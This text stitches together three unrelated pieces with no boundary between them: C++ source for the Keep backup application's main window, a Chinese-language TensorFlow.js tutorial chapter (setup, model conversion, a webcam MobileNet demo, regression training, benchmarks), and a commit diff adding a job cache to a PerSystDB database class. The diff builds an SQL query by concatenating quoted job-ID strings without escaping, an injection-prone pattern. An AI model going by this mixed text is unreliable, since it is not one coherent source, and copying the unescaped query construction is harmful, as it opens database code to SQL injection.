TQT_SLOT(slotViewLog()), actionCollection(), "view_log"); } void KeepMainWindow::initConnections() { connect( m_actionView->m_btnAddWizard, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotAddBackupWizard() ) ); connect( m_actionView->m_btnRestoreWizard, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotRestoreBackupWizard() ) ); connect( m_actionView->m_btnForce, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotForceBackup() ) ); connect( m_actionView->m_btnBackupConfig, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotConfigureBackup() ) ); connect( m_actionView->m_btnLog, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotViewLog() ) ); connect( m_actionView->m_btnLoadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotLoadDaemon() ) ); connect( m_actionView->m_btnUnloadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotUnloadDaemon() ) ); connect( m_actionView->m_btnReloadDaemon, TQT_SIGNAL( clicked()), TQT_TQOBJECT(this), TQT_SLOT( slotReloadDaemon() ) ); } void KeepMainWindow::slotRefreshGUI() { // Sets the Keep Daemon (KDED) State if ( backupSystemRunning() ) { m_actionView->m_lblDaemonState->setText(i18n("<p align=\"right\"><b>Ok</b></p>")); m_actionView->m_btnLoadDaemon->setEnabled(false); m_actionView->m_btnUnloadDaemon->setEnabled(true); m_actionView->m_btnReloadDaemon->setEnabled(true); slotDaemonAlertState(false); } else { m_actionView->m_lblDaemonState->setText(i18n("<p align=\"right\"><b>Not Running</b></p>")); m_actionView->m_btnLoadDaemon->setEnabled(true); m_actionView->m_btnUnloadDaemon->setEnabled(false); m_actionView->m_btnReloadDaemon->setEnabled(false); slotDaemonAlertState(true); } } void KeepMainWindow::slotCheckRDB() { RDBManager manager; if ( manager.isRDB() ) KMessageBox::information(this, i18n("<b>The application rdiff-backup has been detected on your system.</b><br><br> You're running version %1 of rdiff-backup.").arg(manager.RDBVersion())); else KMessageBox::error(this,i18n("<b>The application rdiff-backup has not been detected on your system.</b><br><br>If rdiff-backup is not installed, Keep will not be able to make backups. 
To fix this problem, install rdiff-backup on your system.")); } void KeepMainWindow::slotForceBackup() { ForceBackupDialog *force = new ForceBackupDialog(this); force->show(); } void KeepMainWindow::slotViewLog() { LogDialog *logDialog = new LogDialog(this); logDialog->show(); } void KeepMainWindow::slotConfigureBackup() { BackupConfigDialog *backupConfig = new BackupConfigDialog(this); backupConfig->show(); } void KeepMainWindow::slotConfigure() { //An instance of your dialog could be already created and could be cached, //in which case you want to display the cached dialog instead of creating //another one if ( TDEConfigDialog::showDialog( "settings" ) ) return; //TDEConfigDialog didn't find an instance of this dialog, so lets create it : TDEConfigDialog* dialog = new TDEConfigDialog( this, "settings", KeepSettings::self() ); GeneralConfigView* generalConfigView = new GeneralConfigView( 0, "generalConfigView" ); dialog->addPage( generalConfigView, i18n("General"), "general" ); dialog->show(); } void KeepMainWindow::slotAddBackupWizard() { AddBackupWizard *addBackupWizard = new AddBackupWizard(this, "addBackupWizard"); connect( addBackupWizard, TQT_SIGNAL( backupSetted(Backup)), TQT_TQOBJECT(this), TQT_SLOT( slotAddBackup(Backup) ) ); addBackupWizard->show(); } void KeepMainWindow::slotAddBackup(Backup backup) { BackupConfig *backupConfig = new BackupConfig(); backupConfig->addBackup(backup); delete backupConfig; } void KeepMainWindow::slotRestoreBackupWizard() { RestoreBackupWizard *restoreBackupWizard = new RestoreBackupWizard(this, "restoreBackupWizard"); restoreBackupWizard->show(); } void KeepMainWindow::slotDaemonAlertState(bool state) { if ( !state ) { m_actionView->m_ledDaemonState->setColor(TQt::green); } else { m_actionView->m_ledDaemonState->setColor(TQt::red); } } bool KeepMainWindow::backupSystemRunning() { QCStringList modules; TQCString replyType; TQByteArray replyData; if ( !kapp->dcopClient()->call( "kded", "kded", "loadedModules()", TQByteArray(), replyType, replyData ) ) return false; else { if ( replyType == "QCStringList" ) { TQDataStream reply( replyData, IO_ReadOnly ); reply >> modules; } } QCStringList::ConstIterator end( modules.end() ); for ( QCStringList::ConstIterator it = modules.begin(); it != end; ++it ) { if ( *it == "keep" ) return true; } return false; } void KeepMainWindow::slotLoadDaemon() { TQCString service = "keep"; TQByteArray data, replyData; TQCString replyType; TQDataStream arg( data, IO_WriteOnly ); arg << service; if ( kapp->dcopClient()->call( "kded", "kded", "loadModule(TQCString)", data, replyType, replyData ) ) { TQDataStream reply( replyData, IO_ReadOnly ); if ( replyType == "bool" ) { bool result; reply >> result; if ( !result ) { return; } } else { KMessageBox::error( this, i18n( "Incorrect reply from KDED." ) ); return; } } else { KMessageBox::error( this, i18n( "Unable to contact KDED." ) ); return; } slotRefreshGUI(); } void KeepMainWindow::slotUnloadDaemon() { TQCString service = "keep"; TQByteArray data; TQDataStream arg( data, IO_WriteOnly ); arg << service; if ( !kapp->dcopClient()->send( "kded", "kded", "unloadModule(TQCString)", data ) ) { KMessageBox::error( this, i18n( "Unable to stop service." ) ); return; } slotRefreshGUI(); } void KeepMainWindow::slotReloadDaemon() { slotUnloadDaemon(); slotLoadDaemon(); } #include "keepmainwindow.moc"
TensorFlow in JavaScript(Huan) Atwood’s Law “Any application that can be written in JavaScript, will eventually be written in JavaScript.” – Jeff Atwood, Founder of StackOverflow.com “JavaScript now works.” – Paul Graham, YC Founder TensorFlow.js 简介 ../../_images/tensorflow-js.gif TensorFlow.js 是 TensorFlow 的 JavaScript 版本,支持GPU硬件加速,可以运行在 Node.js 或浏览器环境中。它不但支持完全基于 JavaScript 从头开发、训练和部署模型,也可以用来运行已有的 Python 版 TensorFlow 模型,或者基于现有的模型进行继续训练。 ../../_images/architecture.gif TensorFlow.js 支持 GPU 硬件加速。在 Node.js 环境中,如果有 CUDA 环境支持,或者在浏览器环境中,有 WebGL 环境支持,那么 TensorFlow.js 可以使用硬件进行加速。 微信小程序 微信小程序也提供了官方插件,封装了TensorFlow.js库,利用小程序WebGL API给第三方小程序调用时提供GPU加速。 本章,我们将基于 TensorFlow.js 1.0,向大家简单地介绍如何基于 ES6 的 JavaScript 进行 TensorFlow.js 的开发,然后提供两个例子,并基于例子进行详细的讲解和介绍,最终实现使用纯 JavaScript 进行 TensorFlow 模型的开发、训练和部署。 章节代码地址 本章中提到的 JavaScript 版 TensorFlow 的相关代码,使用说明,和训练好的模型文件及参数,都可以在作者的 GitHub 上找到。地址: https://github.com/huan/tensorflow-handbook-javascript 浏览器中使用 TensorFlow.js 的优势 ../../_images/chrome-ml.png TensorFlow.js 可以让我们直接在浏览器中加载 TensorFlow,让用户立即通过本地的CPU/GPU资源进行我们所需要的机器学习运算,更灵活地进行AI应用的开发。 浏览器中进行机器学习,相对比与服务器端来讲,将拥有以下四大优势: • 不需要安装软件或驱动(打开浏览器即可使用); • 可以通过浏览器进行更加方便的人机交互; • 可以通过手机浏览器,调用手机硬件的各种传感器(如:GPS、电子罗盘、加速度传感器、摄像头等); • 用户的数据可以无需上传到服务器,在本地即可完成所需操作。 通过这些优势,TensorFlow.js 将给开发者带来极高的灵活性。比如在 Google Creative Lab 在2018年7月发布的 Move Mirror 里,我们可以在手机上打开浏览器,通过手机摄像头检测视频中用户的身体动作姿势,然后通过对图片数据库中类似身体动作姿势的检索,给用户显示一个最能够和他当前动作相似的照片。在Move Mirror的运行过程中,数据没有上传到服务器,所有的运算都是在手机本地,基于手机的CPU/GPU完成的,而这项技术,将使Servreless与AI应用结合起来成为可能。 ../../_images/move-mirror.jpg TensorFlow.js 环境配置 在浏览器中使用 TensorFlow.js 在浏览器中加载 TensorFlow.js ,最方便的办法是在 HTML 中直接引用 TensorFlow.js 发布的 NPM 包中已经打包安装好的 JavaScript 代码。 <html> <head> <script src="http://unpkg.com/@tensorflow/tfjs/dist/tf.min.js"></script> 在 Node.js 中使用 TensorFlow.js 服务器端使用 JavaScript ,首先需要按照 NodeJS.org 官网的说明,完成安装最新版本的 Node.js 。 然后,完成以下四个步骤即可完成配置: 1. 确认 Node.js 版本(v10 或更新的版本): $ node --verion v10.5.0 $ npm --version 6.4.1 2. 建立 TensorFlow.js 项目目录: $ mkdir tfjs $ cd tfjs 3. 安装 TensorFlow.js: # 初始化项目管理文件 package.json $ npm init -y # 安装 tfjs 库,纯 JavaScript 版本 $ npm install @tensorflow/tfjs # 安装 tfjs-node 库,C Binding 版本 $ npm install @tensorflow/tfjs-node # 安装 tfjs-node-gpu 库,支持 CUDA GPU 加速 $ npm install @tensorflow/tfjs-node-gpu 4. 
确认 Node.js 和 TensorFlow.js 工作正常: $ node > require('@tensorflow/tfjs').version { 'tfjs-core': '1.3.1', 'tfjs-data': '1.3.1', 'tfjs-layers': '1.3.1', 'tfjs-converter': '1.3.1', tfjs: '1.3.1' } > 如果你看到了上面的 tfjs-core, tfjs-data, tfjs-layerstfjs-converter 的输出信息,那么就说明环境配置没有问题了。 然後,在 JavaScript 程序中,通过以下指令,即可引入 TensorFlow.js: import * as tf from '@tensorflow/tfjs' console.log(tf.version.tfjs) // Output: 1.3.1 使用 import 加载 JavaScript 模块 import 是 JavaScript ES6 版本新开始拥有的新特性。粗略可以认为等价于 require。比如:import * as tf from '@tensorflow/tfjs'const tf = require('@tensorflow/tfjs') 对上面的示例代码是等价的。希望了解更多的读者,可以访问 MDN 文档 在微信小程序中使用 TensorFlow.js TensorFlow.js 微信小程序插件封装了 TensorFlow.js 库,用于提供给第三方小程序调用。 在使用插件前,首先要在小程序管理后台的“设置-第三方服务-插件管理”中添加插件。开发者可登录小程序管理后台,通过 appid _wx6afed118d9e81df9_ 查找插件并添加。本插件无需申请,添加后可直接使用。 例子可以看 TFJS Mobilenet: 物体识别小程序 TensorFlow.js 微信小程序官方文档地址 TensorFlow.js 微信小程序教程 为了推动微信小程序中人工智能应用的发展,Google 专门为微信小程序打造了最新 TensorFlow.js 插件,并联合 Google 认证机器学习专家、微信、腾讯课堂 NEXT 学院,联合推出了“NEXT学院:TensorFlow.js遇到小程序”课程,帮助小程序开发者带来更加易于上手和流畅的 TensorFlow.js 开发体验。 上述课程主要介绍了如何将 TensorFlow.js 插件嵌入到微信小程序中,并基于其进行开发。课程中以一个姿态检测的模型 PoseNet 作为案例,介绍了 TensorFlow.js 插件导入到微信小程序开发工具中后,在项目开发中的配置,功能调用,加载模型等方法应用;此外,还介绍了在 Python 环境下训练好的模型如何转换并载入到小程序中。 本章作者也参与了课程制作,课程中的案列简单有趣易上手,通过学习,可以快速熟悉 TensorFlow.js 在小程序中的开发和应用.有兴趣的读者可以前往 NEXT 学院,进行后续深度学习。 课程地址:https://ke.qq.com/course/428263 TensorFlow.js 模型部署 通过 TensorFlow.js 加载 Python 模型 一般 TensorFlow 的模型,会被存储为 SavedModel 格式。这也是 Google 目前推荐的模型保存最佳实践。SavedModel 格式可以通过 tensorflowjs-converter 转换器转换为可以直接被 TensorFlow.js 加载的格式,从而在JavaScript语言中进行使用。 1. 安装 tensorflowjs_converter $ pip install tensorflowjs tensorflowjs_converter 的使用细节,可以通过 --help 参数查看程序帮助: $ tensorflowjs_converter --help 1. 以下我们以 MobilenetV1 为例,看一下如何对模型文件进行转换操作,并将可以被 TensorFlow.js 加载的模型文件,存放到 /mobilenet/tfjs_model 目录下。 转换 SavedModel:将 /mobilenet/saved_model 转换到 /mobilenet/tfjs_model tensorflowjs_converter \ --input_format=tf_saved_model \ --output_node_names='MobilenetV1/Predictions/Reshape_1' \ --saved_model_tags=serve \ /mobilenet/saved_model \ /mobilenet/tfjs_model 转换完成的模型,保存为了两类文件: • model.json:模型架构 • group1-shard*of*:模型参数 举例来说,我们对 MobileNet v2 转换出来的文件,如下: /mobilenet/tfjs_model/model.json /mobilenet/tfjs_model/group1-shard1of5 … /mobilenet/tfjs_model/group1-shard5of5 1. 为了加载转换完成的模型文件,我们需要安装 tfjs-converter@tensorflow/tfjs 模块: $ npm install @tensorflow/tfjs 2. 然后,我们就可以通过 JavaScript 来加载 TensorFlow 模型了! 
import * as tf from '@tensorflow/tfjs' const MODEL_URL = '/mobilenet/tfjs_model/model.json' const model = await tf.loadGraphModel(MODEL_URL) const cat = document.getElementById('cat') model.execute(tf.browser.fromPixels(cat)) 转换 TFHub 模型 将 TFHub 模型 https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/classification/1 转换到 /mobilenet/tfjs_model: tensorflowjs_converter \\ --input_format=tf_hub \\ 'https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/classification/1' \\ /mobilenet/tfjs_model 使用 TensorFlow.js 模型库 TensorFlow.js 提供了一系列预训练好的模型,方便大家快速地给自己的程序引入人工智能能力。 模型库 GitHub 地址:https://github.com/tensorflow/tfjs-models,其中模型分类包括图像识别、语音识别、人体姿态识别、物体识别、文字分类等。 由于这些API默认模型文件都存储在谷歌云上,直接使用会导致中国用户无法直接读取。在程序内使用模型API时要提供 modelUrl 的参数,可以指向谷歌中国的镜像服务器。 谷歌云的base url是 https://storage.googleapis.com, 中国镜像的base url是 https://www.gstaticcnapps.cn 模型的url path是一致的。以 posenet模型为例: • 谷歌云地址是:https://storage.googleapis.com/tfjs-models/savedmodel/posenet/mobilenet/float/050/model-stride16.json • 中国镜像地址是:https://www.gstaticcnapps.cn/tfjs-models/savedmodel/posenet/mobilenet/float/050/model-stride16.json 在浏览器中使用 MobileNet 进行摄像头物体识别 这里我们将通过一个简单的 HTML 页面,来调用 TensorFlow.js 和与训练好的 MobileNet ,在用户的浏览器中,通过摄像头来识别图像中的物体是什么。 1. 我们建立一个 HTML 文件,在头信息中,通过将 NPM 模块转换为在线可以引用的免费服务 unpkg.com,来加载 @tensorflow/tfjs@tensorflow-models/mobilenet 两个 TFJS 模块: <head> <script src="https://unpkg.com/@tensorflow/tfjs"></script> <script src="https://unpkg.com/@tensorflow-models/mobilenet"> </script> </head> 1. 我们声明三个 HTML 元素:用来显示视频的 <video>,用来显示我们截取特定帧的 <img>,和用来显示检测文字结果的 <p> <video width=400 height=300></video> <p></p> <img width=400 height=300 /> 1. 我们通过 JavaScript ,将对应的 HTML 元素进行初始化:video, image, status 三个变量分别用来对应 <video>, <img>, <p> 三个 HTML 元素,canvasctx 用来做从摄像头获取视频流数据的中转存储。model 将用来存储我们从网络上加载的 MobileNet: const video = document.querySelector('video') const image = document.querySelector('img') const status = document.querySelector("p") const canvas = document.createElement('canvas') const ctx = canvas.getContext('2d') let model 1. main() 用来初始化整个系统,完成加载 MobileNet 模型,将用户摄像头的数据绑定 <video> 这个 HTML 元素上,最后触发 refresh() 函数,进行定期刷新操作: async function main () { status.innerText = "Model loading..." model = await mobilenet.load() status.innerText = "Model is loaded!" const stream = await navigator.mediaDevices.getUserMedia({ video: true }) video.srcObject = stream await video.play() canvas.width = video.videoWidth canvas.height = video.videoHeight refresh() } 1. refresh() 函数,用来从视频中取出当前一帧图像,然后通过 MobileNet 模型进行分类,并将分类结果,显示在网页上。然后,通过 setTimeout,重复执行自己,实现持续对视频图像进行处理的功能: async function refresh(){ ctx.drawImage(video, 0,0) image.src = canvas.toDataURL('image/png') await model.load() const predictions = await model.classify(image) const className = predictions[0].className const percentage = Math.floor(100 * predictions[0].probability) status.innerHTML = percentage + '%' + ' ' + className setTimeout(refresh, 100) } 整体功能,只需要一个文件,几十行 HTML/JavaScript 即可实现。可以直接在浏览器中运行,完整的 HTML 代码如下: <html> <head> <script src="https://unpkg.com/@tensorflow/tfjs"></script> <script src="https://unpkg.com/@tensorflow-models/mobilenet"> </script> </head> <video width=400 height=300></video> <p></p> <img width=400 height=300 /> <script> const video = document.querySelector('video') const image = document.querySelector('img') const status = document.querySelector("p") const canvas = document.createElement('canvas') const ctx = canvas.getContext('2d') let model main() async function main () { status.innerText = "Model loading..." model = await mobilenet.load() status.innerText = "Model is loaded!" 
Using MobileNet for webcam object recognition in the browser

Here we will build a simple HTML page that calls TensorFlow.js and the pretrained MobileNet model to recognize, in the user's browser, what object the camera is looking at.

1. Create an HTML file. In its head, load the two TFJS modules @tensorflow/tfjs and @tensorflow-models/mobilenet through unpkg.com, a free service that exposes NPM modules over HTTP:

```html
<head>
    <script src="https://unpkg.com/@tensorflow/tfjs"></script>
    <script src="https://unpkg.com/@tensorflow-models/mobilenet"></script>
</head>
```

2. Declare three HTML elements: a <video> to show the video, an <img> to show the frame we capture, and a <p> to show the detection result as text:

```html
<video width=400 height=300></video>
<p></p>
<img width=400 height=300 />
```

3. Initialize things in JavaScript: the variables video, image and status correspond to the <video>, <img> and <p> elements; canvas and ctx act as intermediate storage for frames pulled from the camera stream; model will hold the MobileNet we load from the network:

```js
const video = document.querySelector('video')
const image = document.querySelector('img')
const status = document.querySelector("p")

const canvas = document.createElement('canvas')
const ctx = canvas.getContext('2d')

let model
```

4. main() initializes the whole system: it loads the MobileNet model, binds the user's camera stream to the <video> element, and finally triggers refresh() to start the periodic update loop:

```js
async function main () {
    status.innerText = "Model loading..."
    model = await mobilenet.load()
    status.innerText = "Model is loaded!"

    const stream = await navigator.mediaDevices.getUserMedia({ video: true })
    video.srcObject = stream
    await video.play()

    canvas.width = video.videoWidth
    canvas.height = video.videoHeight

    refresh()
}
```

5. refresh() grabs the current frame from the video, classifies it with the MobileNet model, shows the result on the page, and then reschedules itself with setTimeout so the video keeps being processed:

```js
async function refresh(){
    ctx.drawImage(video, 0,0)
    image.src = canvas.toDataURL('image/png')

    const predictions = await model.classify(image)

    const className = predictions[0].className
    const percentage = Math.floor(100 * predictions[0].probability)

    status.innerHTML = percentage + '%' + ' ' + className

    setTimeout(refresh, 100)
}
```

The whole thing is a single file and a few dozen lines of HTML/JavaScript, and it runs directly in the browser. The complete HTML is:

```html
<html>
<head>
    <script src="https://unpkg.com/@tensorflow/tfjs"></script>
    <script src="https://unpkg.com/@tensorflow-models/mobilenet"></script>
</head>

<video width=400 height=300></video>
<p></p>
<img width=400 height=300 />

<script>
    const video = document.querySelector('video')
    const image = document.querySelector('img')
    const status = document.querySelector("p")

    const canvas = document.createElement('canvas')
    const ctx = canvas.getContext('2d')

    let model

    main()

    async function main () {
        status.innerText = "Model loading..."
        model = await mobilenet.load()
        status.innerText = "Model is loaded!"

        const stream = await navigator.mediaDevices.getUserMedia({ video: true })
        video.srcObject = stream
        await video.play()

        canvas.width = video.videoWidth
        canvas.height = video.videoHeight

        refresh()
    }

    async function refresh(){
        ctx.drawImage(video, 0,0)
        image.src = canvas.toDataURL('image/png')

        const predictions = await model.classify(image)

        const className = predictions[0].className
        const percentage = Math.floor(100 * predictions[0].probability)

        status.innerHTML = percentage + '%' + ' ' + className

        setTimeout(refresh, 100)
    }
</script>
</html>
```

[Figure: mobilenet.png — a screenshot of it running: the water cup is recognized as "beer glass" with 90% confidence.]

TensorFlow.js model training

Unlike TensorFlow Serving and TensorFlow Lite, TensorFlow.js supports not only model deployment and inference but also training models directly in TensorFlow.js.

In the TensorFlow basics chapter we already used Python for the task of fitting a city's house prices over 2013–2017 by linear regression, i.e. fitting the data with the linear model y = ax + b, where a and b are the parameters to be solved for. Below we reimplement a JavaScript version with TensorFlow.js.

First, we define the data and apply basic normalization:

```js
const xsRaw = tf.tensor([2013, 2014, 2015, 2016, 2017])
const ysRaw = tf.tensor([12000, 14000, 15000, 16500, 17500])

// Normalize to the [0, 1] range
const xs = xsRaw.sub(xsRaw.min())
                .div(xsRaw.max().sub(xsRaw.min()))
const ys = ysRaw.sub(ysRaw.min())
                .div(ysRaw.max().sub(ysRaw.min()))
```

Next, we solve for the two parameters a and b of the linear model. We use loss() to compute the loss and optimizer.minimize() to update the model parameters automatically.

Fat arrow functions in JavaScript

Since the ES6 version of JavaScript, arrow functions (=>) are allowed as a shorthand for declaring and writing functions, similar to lambda expressions in Python. For example, the arrow function

```js
const sum = (a, b) => {
    return a + b
}
```

is equivalent in effect to the traditional function

```js
const sum = function (a, b) {
    return a + b
}
```

Arrow functions, however, have no this or arguments of their own, cannot be used as constructors (with new), and cannot be used as generators (no yield). Interested readers can consult the MDN documentation to learn more.

dataSync() and related data-synchronization functions in TensorFlow.js

dataSync() pulls tensor data back from the GPU. Think of it as the counterpart of .numpy() in Python: it retrieves the data so it can be displayed or used in local computation. Interested readers can consult the TensorFlow.js documentation to learn more.
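A quick illustration of that round trip (my own example, not from the original text):

```js
const t = tf.tensor([1, 2, 3])
const squared = t.square()        // runs on the WebGL backend when available
console.log(squared.dataSync())   // Float32Array [1, 4, 9] — copied back synchronously
```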
sub() and related math functions in TensorFlow.js

TensorFlow.js supports both calling styles, tf.sub(a, b) and a.sub(b). They are equivalent, so pick whichever you prefer. Interested readers can consult the TensorFlow.js documentation to learn more.

```js
const a = tf.scalar(Math.random()).variable()
const b = tf.scalar(Math.random()).variable()

// y = a * x + b
const f = (x) => a.mul(x).add(b)
const loss = (pred, label) => pred.sub(label).square().mean()

const learningRate = 1e-3
const optimizer = tf.train.sgd(learningRate)

// Train the model
for (let i = 0; i < 10000; i++) {
    optimizer.minimize(() => loss(f(xs), ys))
}

// Predict
console.log(`a: ${a.dataSync()}, b: ${b.dataSync()}`)
const preds = f(xs).dataSync()
const trues = ys.arraySync()
preds.forEach((pred, i) => {
    console.log(`x: ${i}, pred: ${pred.toFixed(2)}, true: ${trues[i].toFixed(2)}`)
})
```

The sample output below shows the fit is already fairly close:

```
a: 0.9339302778244019, b: 0.08108722418546677
x: 0, pred: 0.08, true: 0.00
x: 1, pred: 0.31, true: 0.36
x: 2, pred: 0.55, true: 0.55
x: 3, pred: 0.78, true: 0.82
x: 4, pred: 1.02, true: 1.00
```

This can run directly in the browser; the complete HTML is:

```html
<html>
<head>
    <script src="http://unpkg.com/@tensorflow/tfjs/dist/tf.min.js"></script>
    <script>
        const xsRaw = tf.tensor([2013, 2014, 2015, 2016, 2017])
        const ysRaw = tf.tensor([12000, 14000, 15000, 16500, 17500])

        // Normalize to the [0, 1] range
        const xs = xsRaw.sub(xsRaw.min())
                        .div(xsRaw.max().sub(xsRaw.min()))
        const ys = ysRaw.sub(ysRaw.min())
                        .div(ysRaw.max().sub(ysRaw.min()))

        const a = tf.scalar(Math.random()).variable()
        const b = tf.scalar(Math.random()).variable()

        // y = a * x + b
        const f = (x) => a.mul(x).add(b)
        const loss = (pred, label) => pred.sub(label).square().mean()

        const learningRate = 1e-3
        const optimizer = tf.train.sgd(learningRate)

        // Train the model
        for (let i = 0; i < 10000; i++) {
            optimizer.minimize(() => loss(f(xs), ys))
        }

        // Predict
        console.log(`a: ${a.dataSync()}, b: ${b.dataSync()}`)
        const preds = f(xs).dataSync()
        const trues = ys.arraySync()
        preds.forEach((pred, i) => {
            console.log(`x: ${i}, pred: ${pred.toFixed(2)}, true: ${trues[i].toFixed(2)}`)
        })
    </script>
</head>
</html>
```

TensorFlow.js performance comparison

For TensorFlow.js performance, Google published a MobileNet-based benchmark that can serve as a reference. The benchmark takes the MobileNet TensorFlow model and runs its JavaScript and Python versions two hundred times each. The conclusions follow.

Mobile-browser performance (in milliseconds):

[Figure: performance-mobile.png]

One inference with TensorFlow.js in a mobile browser takes:
• 22 ms on an iPhone X
• 100 ms on a Pixel 3

Compared with the TensorFlow Lite baseline, TensorFlow.js in the mobile browser takes 1.2× the baseline time on the iPhone X and 1.8× on the Pixel 3.

Desktop-browser performance (in milliseconds):

In the browser, TensorFlow.js can use WebGL for hardware acceleration and put the GPU to work.

[Figure: performance-browser.gif]

One inference with TensorFlow.js in the browser takes:
• 97 ms on the CPU
• 10 ms on the GPU (WebGL)

Compared with the Python baseline, TensorFlow.js in the browser takes 1.7× the baseline time on the CPU and 3.8× on the GPU (WebGL).

Node.js performance:

In Node.js, TensorFlow.js uses TensorFlow's C binding, so it can get essentially on par with Python.

[Figure: performance-node.png]

One inference with TensorFlow.js in Node.js takes:
• 56 ms on the CPU
• 14 ms on the GPU (CUDA)

Compared with the Python baseline, TensorFlow.js in Node.js matches the baseline on the CPU and takes 1.6× the baseline time on the GPU (CUDA).
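As a side note — my own sketch, not part of the original benchmark — you can confirm from Node.js that the native C-binding backend is the one actually in use:

```js
// Requires the @tensorflow/tfjs-node package; requiring it registers the
// native TensorFlow backend in place of the pure-JS CPU backend.
const tf = require('@tensorflow/tfjs-node')
console.log(tf.getBackend())   // prints 'tensorflow' when the C binding is active
```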
Commit 0f38456f authored by Alessio Netti's avatar Alessio Netti Browse files Merge remote-tracking branch 'origin/development' into development parents 0b053866 3da788c6 ......@@ -121,12 +121,24 @@ PerSystDB::~PerSystDB(){ bool PerSystDB::getDBJobIDs(std::vector<std::string> & job_id_strings, std::map<std::string, std::string>& job_id_map) { std::lock_guard<std::mutex> lock(mut); std::vector<std::string> notfound; for(auto & job_id_str: job_id_strings){ auto found = _jobCache.find(job_id_str); if(found != _jobCache.end()){ job_id_map[job_id_str] = found->second.job_id_db; found->second.last_seen_timestamp = getTimestamp(); } else { notfound.push_back(job_id_str); } } if(!notfound.size()){ //every job was found return true; } std::stringstream build_query; build_query << "SELECT job_id, job_id_string FROM Accounting WHERE job_id_string IN ("; for (std::vector<std::string>::size_type i = 0; i < job_id_strings.size(); ++i) { build_query << "'" << job_id_strings[i] << "'"; if (i != job_id_strings.size() - 1) { //not last element for (std::vector<std::string>::size_type i = 0; i < notfound.size(); ++i) { build_query << "'" << notfound[i] << "'"; if (i != notfound.size() - 1) { //not last element build_query << ","; } } ......@@ -143,13 +155,28 @@ bool PerSystDB::getDBJobIDs(std::vector<std::string> & job_id_strings, std::map< MYSQL_ROW row; while ((row = result.fetch_row())) { if (row[0]) { job_id_map[std::string(row[1])] = row[0]; std::string job_id_db = row[0]; std::string job_id_string = std::string(row[1]); job_id_map[job_id_string] = job_id_db; addJobToCache(job_id_string, job_id_db); } } } return true; } void PerSystDB::addJobToCache(std::string &job_id_string, std::string & job_id_db){ if(_jobCache.size() == JOB_CACHE_MAX_SIZE){ //remove one element before inserting using MyPairType = std::pair<std::string, PerSystDB::Job_info_t>; auto smallest = std::min_element(_jobCache.begin(), _jobCache.end(), [](const MyPairType& l, const MyPairType& r) -> bool {return l.second.last_seen_timestamp < r.second.last_seen_timestamp;}); _jobCache.erase(smallest); } Job_info_t ji; ji.job_id_db = job_id_db; ji.last_seen_timestamp = getTimestamp(); _jobCache[job_id_string] = ji; } bool PerSystDB::getCurrentSuffixAggregateTable(std::string & suffix){ if(_end_aggregate_timestamp){ ...... ......@@ -45,14 +45,17 @@ struct Aggregate_info_t { float severity_average; }; class PerSystDB { private: struct Job_info_t { std::string job_id_db; unsigned long long last_seen_timestamp; }; class PerSystDB { public: enum Rotation_t { EVERY_YEAR, EVERY_MONTH, EVERY_XDAYS //number of days must be provided EVERY_YEAR, EVERY_MONTH, EVERY_XDAYS //number of days must be provided }; protected: ......@@ -70,30 +73,66 @@ protected: static PerSystDB * instance; static std::mutex mut; bool _initialized; std::map<std::string, Job_info_t> _jobCache; const std::size_t JOB_CACHE_MAX_SIZE = 10000; /** print error. * Prints the mysql error message. If connection is gone (Error 2006) then we also close the connection. * Please check with isInitialized() to initialize it again. 
*/ void print_error(); bool getCurrentSuffixAggregateTable(std::string & new_suffix); bool createNewAggregate(std::string& new_suffix); void getNewDates(const std::string& last_end_timestamp, std::string & begin_timestamp, std::string & end_timestamp); void addJobToCache(std::string &job_id_string, std::string & job_id_db); public: bool initializeConnection(const std::string & host, const std::string & user, const std::string & password, const std::string & database_name, Rotation_t rotation, int port =3306, unsigned int every_x_days = 0); bool finalizeConnection(); /** * Connect to database. */ bool initializeConnection(const std::string & host, const std::string & user, const std::string & password, const std::string & database_name, Rotation_t rotation, int port = 3306, unsigned int every_x_days = 0); bool isInitialized(){ return _initialized; } /** * Disconnect */ bool finalizeConnection(); /** * Check if job_id (db) exist. If map empty it doesn't exist/job not found is not yet on accounting. * @param job_id_strings job id strings including array jobid. * @param job_id_map job_id_string to job_id (db) map */ bool getDBJobIDs(std::vector<std::string> & job_id_strings, std::map<std::string, std::string>& job_id_map); /** * Insert job in the accounting table. */ bool insertIntoJob(const std::string& job_id_string, unsigned long long uid, int & job_id_db, const std::string & suffix); void getNewDates(const std::string& last_end_timestamp, std::string & begin_timestamp, std::string & end_timestamp); /** * Insert performance data into the aggregate table (Aggregate_<suffix> */ bool insertInAggregateTable(const std::string& suffix, Aggregate_info_t & agg_info); /** * Update the last suffix in the Accounting table */ bool updateJobsLastSuffix(std::map<std::string, std::string>& job_map, std::string & suffix); /** * Get the next or the current table suffix */ bool getTableSuffix(std::string & table_suffix); /** * Singleton object. Get here your instance! */ static PerSystDB * getInstance(); }; ...... ......@@ -116,6 +116,23 @@ void PerSystSqlOperator::printConfig(LOG_LEVEL ll) { LOG_VAR(ll) << "\tseverity_max_memory=" << _severity_max_memory; } bool PerSystSqlOperator::execOnStart(){ if( _backend == MARIADB ) { if(!_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)){ LOG(error) << "Database not initialized"; return false; } } return true; } void PerSystSqlOperator::execOnStop(){ if( _backend == MARIADB ) { _persystdb->finalizeConnection(); } } void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { // Clearing the buffer, if already allocated _buffer.clear(); ......@@ -150,8 +167,13 @@ void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { compute_internal(unit, _buffer, agg_info); if( _backend == MARIADB ) { if(!_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)) if (!_persystdb->isInitialized() && !_persystdb->initializeConnection(_conn.host, _conn.user, _conn.password, _conn.database_name, _conn.rotation, _conn.port, _conn.every_x_days)) { LOG(error) << "Database not initialized"; return; } std::stringstream 